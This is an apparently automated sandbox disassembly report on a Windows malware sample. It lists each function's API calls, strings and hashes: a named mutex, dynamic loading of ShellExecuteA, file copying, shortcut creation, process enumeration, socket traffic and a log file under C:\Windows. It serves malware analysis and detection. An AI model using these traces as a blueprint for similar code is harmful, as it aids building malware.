                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Create$ErrorLibraryLoadMapping$AddressExitLastModeModuleMutexNameProcProcessSleepView
                                                                                                            • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
                                                                                                            • API String ID: 3566498206-162185446
                                                                                                            • Opcode ID: c54cde7ec83a3bae0523b54c49bb16d0c2bc73c4507ee6bb323365d066d2b875
                                                                                                            • Instruction ID: 5e9954dee9583d03e747c28a5ef98bf29c8e86bafa0e794dd92df4a7355570a6
                                                                                                            • Opcode Fuzzy Hash: c54cde7ec83a3bae0523b54c49bb16d0c2bc73c4507ee6bb323365d066d2b875
                                                                                                            • Instruction Fuzzy Hash: 2D616C72641288ABEF10DF60CD49FEA3778EF44B05F548415EE0DBE1E0D6B1AA448B1E
                                                                                                            APIs
                                                                                                            • GetSystemDirectoryA.KERNEL32(00000000,000000F8), ref: 008F976E
                                                                                                            • lstrlen.KERNEL32(00000000), ref: 008F977B
                                                                                                            • lstrcat.KERNEL32(00000000,008F3C94), ref: 008F979A
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 008F97CD
                                                                                                            • lstrcat.KERNEL32(00000000,?), ref: 008F983B
                                                                                                              • Part of subcall function 008FA75A: GetTempPathA.KERNEL32(00000080,00000000,?), ref: 008FA78C
                                                                                                              • Part of subcall function 008FA75A: lstrlen.KERNEL32(00000000), ref: 008FA796
                                                                                                              • Part of subcall function 008FA75A: lstrcat.KERNEL32(00000000,008F3CC0), ref: 008FA7B2
                                                                                                              • Part of subcall function 008FA75A: lstrcpy.KERNEL32(00000000,00000000), ref: 008FA7CF
                                                                                                              • Part of subcall function 008FA75A: lstrlen.KERNEL32(00000000,008F2880,00000000), ref: 008FA7FD
                                                                                                              • Part of subcall function 008FA75A: wsprintfA.USER32 ref: 008FA809
                                                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 008F9860
                                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000001), ref: 008F9875
                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000001), ref: 008F9895
                                                                                                            • GlobalFree.KERNEL32(?), ref: 008F98B8
                                                                                                            • GetProcAddress.KERNEL32(00000000,008F2294), ref: 008F98CB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrcatlstrlen$GlobalLibraryLoad$AddressAllocCopyDirectoryFileFreePathProcSystemTemplstrcpywsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 1023114332-0
                                                                                                            • Opcode ID: 3fc18c61d069feba7bd357372c947e1cfb1635f93d6d489af58f03dec38013e1
                                                                                                            • Instruction ID: f8f3acc7f71e0cda5711eafe8e43085b99678eaf4f23a1bcc123fb681509d2c8
                                                                                                            • Opcode Fuzzy Hash: 3fc18c61d069feba7bd357372c947e1cfb1635f93d6d489af58f03dec38013e1
                                                                                                            • Instruction Fuzzy Hash: D7B1F87590122DEFDB64DF64DC88BA9B7B5FB48304F1086D9E609A6250D774AE80CF50
                                                                                                            APIs
                                                                                                            • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 0090151A
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00901542
                                                                                                            • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00901563
                                                                                                            • lstrlen.KERNEL32(008D21A4), ref: 0090156E
                                                                                                            • lstrlen.KERNEL32(008D21A4), ref: 009015A2
                                                                                                            • lstrlen.KERNEL32(008F2654,?), ref: 0090160C
                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0090164E
                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00901672
                                                                                                            • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0090168D
                                                                                                            • SetEndOfFile.KERNEL32(?), ref: 0090169A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$lstrlen$Pointer$AllocCreateGlobalReadWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3635920088-0
                                                                                                            • Opcode ID: 32a3c5315246f4511d3ecc980f51ff6ac4b5a65da3d357bfe493499c32fac3ae
                                                                                                            • Instruction ID: 72087a4b421d4a12d9802a7e2c1a39a62d79a6d87155196c7825597218a74ec4
                                                                                                            • Opcode Fuzzy Hash: 32a3c5315246f4511d3ecc980f51ff6ac4b5a65da3d357bfe493499c32fac3ae
                                                                                                            • Instruction Fuzzy Hash: 4361EA75A00218FFDB14DBA4DD4ABEE7779BF48701F108685F709A6280D774AA80CF91
                                                                                                            APIs
                                                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 008F7C83
                                                                                                            • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 008F7CD8
                                                                                                            • connect.WS2_32(000000FF,00000002,00000010), ref: 008F7CEB
                                                                                                            • WSAGetLastError.WS2_32 ref: 008F7D05
                                                                                                            • Sleep.KERNEL32(00000032), ref: 008F7D1F
                                                                                                            • select.WS2_32(000000FE,00000000,00000000,00000000,00000000), ref: 008F7E79
                                                                                                            • ioctlsocket.WS2_32(000000FF,8004667E,00000000), ref: 008F7EE6
                                                                                                            • closesocket.WS2_32(000000FF), ref: 008F7EFB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ioctlsocket$ErrorLastSleepclosesocketconnectselectsocket
                                                                                                            • String ID: 3'$@$@
                                                                                                            • API String ID: 3016611618-2553492011
                                                                                                            • Opcode ID: 98ff3908514921bf8be9195f7445ad941bf03a79a5729bef96c5e9b69ec0afd8
                                                                                                            • Instruction ID: 13455e5818e2819acb806ff95f892a8d8e2af4231aa81fefc63f0557f94eba1f
                                                                                                            • Opcode Fuzzy Hash: 98ff3908514921bf8be9195f7445ad941bf03a79a5729bef96c5e9b69ec0afd8
                                                                                                            • Instruction Fuzzy Hash: 3F71C77494822C9BEB24DB64D888BF9B775FF64304F2086D9D68AA6244DBB45EC08F50
                                                                                                            APIs
                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\RHxJqGoGFB.exe,000001FE), ref: 004038EB
                                                                                                            • LoadLibraryExA.KERNELBASE(SHELL32.DLL,00000000,00000000), ref: 0040390A
                                                                                                            • GetProcAddress.KERNELBASE(00000000,ShellExecuteA), ref: 00403918
                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Ap1mutx7), ref: 00403945
                                                                                                            • GetLastError.KERNEL32(00000000), ref: 0040394C
                                                                                                            • Sleep.KERNEL32(000927C0), ref: 0040395B
                                                                                                            • ExitProcess.KERNEL32(00000000), ref: 00403963
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4171472191.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4168525358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressCreateErrorExitFileLastLibraryLoadModuleMutexNameProcProcessSleep
                                                                                                            • String ID: Ap1mutx7$C:\Users\user\Desktop\RHxJqGoGFB.exe$SHELL32.DLL$ShellExecuteA$open
                                                                                                            • API String ID: 1721171764-3812599134
                                                                                                            • Opcode ID: b09fcdc90d481aa918e1e9c948669c78c59037ac802c4bdfae635c007d394e48
                                                                                                            • Instruction ID: 4c7eabe6ed2e27b058bd06a9f100e91a826886d495d6e6cdf21b24436c5c7e96
                                                                                                            • Opcode Fuzzy Hash: b09fcdc90d481aa918e1e9c948669c78c59037ac802c4bdfae635c007d394e48
                                                                                                            • Instruction Fuzzy Hash: 4B11DE71244289ABEF10DEA08D49FDA37ACAB44B46F440425BA09FE1E0DAB59744876F
                                                                                                            APIs
                                                                                                            • lstrcpy.KERNEL32(00000000,?), ref: 00900EF4
                                                                                                            • lstrlen.KERNEL32(00000000), ref: 00900F21
                                                                                                            • lstrcat.KERNEL32(?,.lnk), ref: 00900F43
                                                                                                            • lstrcat.KERNEL32(00000000), ref: 00900F70
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,000000FF,000000FF,?,00000104), ref: 00900F8C
                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000020,00000000), ref: 00900FA8
                                                                                                            • lstrlenW.KERNEL32(?), ref: 00900FC8
                                                                                                            • lstrlenW.KERNEL32(?), ref: 00900FFB
                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0090103B
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00901048
                                                                                                              • Part of subcall function 008F44CB: InterlockedExchange.KERNEL32(009090C0,?), ref: 008F44E9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$Filelstrcat$ByteCharCloseCreateExchangeHandleInterlockedMultiWideWritelstrcpy
                                                                                                            • String ID: .lnk
                                                                                                            • API String ID: 2963584520-24824748
                                                                                                            • Opcode ID: cc4b7f6bc754f6aa70e9c81a7d6520cf2b1935f0160e0e9c78a4a192383dedd0
                                                                                                            • Instruction ID: 344408b44c56536b0e9b57217f9b43080eba9e884c2f9f100cd6d2fa1f9b6042
                                                                                                            • Opcode Fuzzy Hash: cc4b7f6bc754f6aa70e9c81a7d6520cf2b1935f0160e0e9c78a4a192383dedd0
                                                                                                            • Instruction Fuzzy Hash: 814183B6900218ABDB21DB64DC49BEA77B9FF48301F0486E9F309E61D0DB745B898F50
                                                                                                            APIs
                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,0097EED8,000001FE), ref: 0097D935
                                                                                                            • LoadLibraryExA.KERNELBASE(SHELL32.DLL,00000000,00000000), ref: 0097D954
                                                                                                            • GetProcAddress.KERNELBASE(00000000,ShellExecuteA), ref: 0097D962
                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Ap1mutx7), ref: 0097D98F
                                                                                                            • GetLastError.KERNEL32(00000000), ref: 0097D996
                                                                                                            • Sleep.KERNEL32(000927C0), ref: 0097D9A5
                                                                                                            • ExitProcess.KERNEL32(00000000), ref: 0097D9AD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressCreateErrorExitFileLastLibraryLoadModuleMutexNameProcProcessSleep
                                                                                                            • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
                                                                                                            • API String ID: 1721171764-1163154406
                                                                                                            • Opcode ID: b09fcdc90d481aa918e1e9c948669c78c59037ac802c4bdfae635c007d394e48
                                                                                                            • Instruction ID: fd8dafce17baf11444bd646670ff5ee0c8158fc99f9a2a37c0f1bf5be81445f5
                                                                                                            • Opcode Fuzzy Hash: b09fcdc90d481aa918e1e9c948669c78c59037ac802c4bdfae635c007d394e48
                                                                                                            • Instruction Fuzzy Hash: 6111DB72245289ABEF50DEA08D4DFE937ACAF84B05F444415FA0DFE0E0DAB19600876F
                                                                                                            APIs
                                                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000020,00000000), ref: 00900D32
                                                                                                            • GetFileSize.KERNEL32(000000FF,00000000), ref: 00900D4B
                                                                                                            • GlobalAlloc.KERNEL32(00000040,-00000F68), ref: 00900D6D
                                                                                                            • ReadFile.KERNEL32(000000FF,00000000,00000098,00000000,00000000), ref: 00900D88
                                                                                                            • CreateFileW.KERNEL32(-0000008E,80000000,00000001,00000000,00000003,00000020,00000000), ref: 00900DCC
                                                                                                            • GetFileSize.KERNEL32(000000FF,00000000), ref: 00900DE1
                                                                                                            • GlobalAlloc.KERNEL32(00000040,00010170), ref: 00900DFF
                                                                                                            • ReadFile.KERNEL32(000000FF,00000000,00011170,00000000,00000000), ref: 00900E1A
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00900E46
                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 00900E50
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00900E5A
                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 00900E64
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Global$AllocCloseCreateFreeHandleReadSize
                                                                                                            • String ID:
                                                                                                            • API String ID: 675253578-0
                                                                                                            • Opcode ID: 49e65b505a7beade570ef8ce28e0d98a37af2ef901ed38d0f71fa629c1ee9700
                                                                                                            • Instruction ID: c4715fbebc771d81d562d05b0d1d28b8228139b61f9989b3146b710c1c2a1cf4
                                                                                                            • Opcode Fuzzy Hash: 49e65b505a7beade570ef8ce28e0d98a37af2ef901ed38d0f71fa629c1ee9700
                                                                                                            • Instruction Fuzzy Hash: 8041E7B5E40209FBEB10DBE4DD89BAEBB79BF48701F108649F615B72C0D7B85A408B54
                                                                                                            APIs
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 008F9C94
                                                                                                            • Process32First.KERNEL32(00000000,00000128), ref: 008F9CDD
                                                                                                            • CharUpperA.USER32(?,00000000,00000128,00000002,00000000), ref: 008F9CF1
                                                                                                            • Sleep.KERNEL32(00000400), ref: 008F9D67
                                                                                                            • Sleep.KERNEL32(00000400), ref: 008F9DB2
                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 008F9DC6
                                                                                                            • CharUpperA.USER32(?,00000000,00000128,00000000,00000128,00000002,00000000), ref: 008F9DDA
                                                                                                            • Sleep.KERNEL32(00000400), ref: 008F9E25
                                                                                                            • Sleep.KERNEL32(00000400), ref: 008F9E9D
                                                                                                            • CloseHandle.KERNEL32(00000000,00000002,00000000), ref: 008F9EB3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Sleep$CharProcess32Upper$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                            • String ID:
                                                                                                            • API String ID: 3272108884-0
                                                                                                            • Opcode ID: 2ba953c1799bed389ef154eaec53eef0c74dcf22fd42ea5987ef53acfed69a94
                                                                                                            • Instruction ID: 479810fbca685f694e11d4dacff8e3271bb6781aae3e712bcdda858fc92729c2
                                                                                                            • Opcode Fuzzy Hash: 2ba953c1799bed389ef154eaec53eef0c74dcf22fd42ea5987ef53acfed69a94
                                                                                                            • Instruction Fuzzy Hash: CB5156B1A0112C9BDF24EB24DC49BEAB375FF55300F1441D9E649A7240DBB9AE80CF91
                                                                                                            APIs
                                                                                                              • Part of subcall function 008F44CB: InterlockedExchange.KERNEL32(009090C0,?), ref: 008F44E9
                                                                                                            • lstrcat.KERNEL32(?,008F2490), ref: 00902C53
                                                                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00902D24
                                                                                                            • lstrcat.KERNEL32(00000000,008F3DFC), ref: 00902D86
                                                                                                            • lstrcat.KERNEL32(00000000,008F3E00), ref: 00902D98
                                                                                                            • lstrcat.KERNEL32(00000000,008F3E04), ref: 00902DC1
                                                                                                            • lstrlen.KERNEL32(00000000,%s,00903658,?,?,?,?,?,?), ref: 00902DD7
                                                                                                              • Part of subcall function 00902A35: lstrlen.KERNEL32(00000000), ref: 00902A4E
                                                                                                              • Part of subcall function 00902A35: lstrcat.KERNEL32(00000000,008F3DE0), ref: 00902A7C
                                                                                                              • Part of subcall function 00902A35: lstrcat.KERNEL32(00000000,008F3DE4), ref: 00902AA2
                                                                                                              • Part of subcall function 00902A35: lstrcat.KERNEL32(00000000,008F3DE8), ref: 00902AB1
                                                                                                              • Part of subcall function 00902A35: lstrlen.KERNEL32(00000000), ref: 00902B0C
                                                                                                              • Part of subcall function 00902A35: lstrcat.KERNEL32(00000000,008F3DEC), ref: 00902B40
                                                                                                              • Part of subcall function 00902A35: lstrcat.KERNEL32(00000000,008F3DF0), ref: 00902B66
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrcat$lstrlen$ExchangeInterlockedlstrcpy
                                                                                                            • String ID: %s
                                                                                                            • API String ID: 3361872186-3043279178
                                                                                                            • Opcode ID: 6297888f73b4bd4f4394c9897181510ff52f40e32bc9b4cf876367790272ba09
                                                                                                            • Instruction ID: 415dd8f50df5b65c7b890d1d5d0cb62c78c93fd52ac53bc11145a0b3a3f15a0c
                                                                                                            • Opcode Fuzzy Hash: 6297888f73b4bd4f4394c9897181510ff52f40e32bc9b4cf876367790272ba09
                                                                                                            • Instruction Fuzzy Hash: 596193B6A01118AFDB14DF68DC4A7ED77B5FF8C300F1085AAE609D22D0DB349A958F91
                                                                                                            APIs
                                                                                                            • CreateFileA.KERNEL32(C:\Windows\npqqe.log,40000000,00000002,00000000,00000004,00000080,00000000,?), ref: 008F5507
                                                                                                            • lstrcpy.KERNEL32(00000000,C:\Windows\npqqe.log), ref: 008F553A
                                                                                                            • lstrlen.KERNEL32(00000000,00000000), ref: 008F554E
                                                                                                            • WriteFile.KERNEL32(000000FF,008F6958,00000000,?,00000000), ref: 008F5599
                                                                                                            • SetEndOfFile.KERNEL32(000000FF), ref: 008F55A6
                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 008F55B3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseCreateHandleWritelstrcpylstrlen
                                                                                                            • String ID: C:\Windows\npqqe.log
                                                                                                            • API String ID: 3630773104-2406171112
                                                                                                            • Opcode ID: 109bf235b15cd34f9775851260dc9299a9b32769ae4ebbb3418c684ecbf3444e
                                                                                                            • Instruction ID: e29c11d973cfe8aadfd9854f4e67fcffb9492478c9f99b3b60c914c27d5d0345
                                                                                                            • Opcode Fuzzy Hash: 109bf235b15cd34f9775851260dc9299a9b32769ae4ebbb3418c684ecbf3444e
                                                                                                            • Instruction Fuzzy Hash: F7315EB5900218ABDF20DB64DC8DBDAB779BB58700F0046D9F359A7291DBB46A848F90
                                                                                                            APIs
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,?,?), ref: 008F9BA2
                                                                                                            • Module32First.KERNEL32(?,00000224), ref: 008F9BC5
                                                                                                            • CharUpperA.USER32(?,00000008,?,?), ref: 008F9BDE
                                                                                                            • Module32Next.KERNEL32(?,00000224), ref: 008F9C2E
                                                                                                            • CloseHandle.KERNEL32(?,00000008,?,?), ref: 008F9C3E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Module32$CharCloseCreateFirstHandleNextSnapshotToolhelp32Upper
                                                                                                            • String ID: DWEBIO$DWEBLLIO
                                                                                                            • API String ID: 3788218250-3981995823
                                                                                                            • Opcode ID: d4dc74505e6bdb2525b3b741bf241269ac310abb86b9710f8b2a20f5f04aac50
                                                                                                            • Instruction ID: fcc3ffb16312ab246049b8a08c2ebbf06a2526f7e77d4d9b01a20a38d3d09241
                                                                                                            • Opcode Fuzzy Hash: d4dc74505e6bdb2525b3b741bf241269ac310abb86b9710f8b2a20f5f04aac50
                                                                                                            • Instruction Fuzzy Hash: 8921217190121CABDF20EBB4DD59BEAB3B8FB48300F0045D5E648E2181DB759A848F51
                                                                                                            APIs
                                                                                                            • htons.WS2_32(?), ref: 008F785A
                                                                                                              • Part of subcall function 008F719B: socket.WS2_32(00000002,00000002,00000011), ref: 008F7203
                                                                                                              • Part of subcall function 008F719B: sendto.WS2_32(?,?,00000000,00000000,00000000,00000010), ref: 008F726D
                                                                                                              • Part of subcall function 008F719B: select.WS2_32(?,00000000,00000000,00000000,0000000F), ref: 008F7345
                                                                                                            • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 008F78CA
                                                                                                            • htons.WS2_32(?), ref: 008F78E2
                                                                                                            • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 008F7940
                                                                                                            • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 008F79DC
                                                                                                            • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 008F7A19
                                                                                                              • Part of subcall function 008F6330: RtlEnterCriticalSection.NTDLL(00909050), ref: 008F63CD
                                                                                                              • Part of subcall function 008F6330: RtlLeaveCriticalSection.NTDLL(00909050), ref: 008F6960
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 008F7A23
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 008F7A2B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
